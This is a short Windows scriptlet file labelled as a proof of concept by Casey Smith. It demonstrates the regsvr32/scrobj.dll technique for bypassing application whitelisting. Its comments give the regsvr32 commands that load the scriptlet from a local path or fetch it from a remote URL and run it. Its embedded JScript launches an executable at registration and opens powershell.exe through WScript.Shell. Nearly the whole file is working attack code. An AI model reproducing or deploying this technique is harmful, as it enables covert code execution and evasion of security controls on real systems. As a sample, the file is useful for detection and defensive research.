<?XML version="1.0"?>	
<scriptlet>	

<registration	
    description="HelloKids"	
    progid="HelloKids"	
    version="1.00"	
    classid="{20001111-0000-0000-0000-0000FEEDACDC}"	
	>	
	<!-- regsvr32 /s /i"C:\Hello\HelloKids.sct" scrobj.dll -->	
	<!-- regsvr32 /s /i:http://server/HelloKids.sct scrobj.dll -->	
	<!-- That should work over a proxy and SSL/TLS... -->	
	<!-- Proof Of Concept - Casey Smith @subTee -->	
	<script language="JScript">	
		<![CDATA[	

			var help = new ActiveXObject("WScript.Shell").Run("C:\\Program Files\\Cosmopolitanize\\Diggins.exe");		

		]]>	
</script>	
</registration>	

<public>	
    <method name="Exec"></method>	
</public>	
<script language="JScript">	
<![CDATA[	

	function Exec()	
	{	
		var help = new ActiveXObject("WScript.Shell").Run("powershell.exe");	
	}	

]]>	
</script>	

</scriptlet>
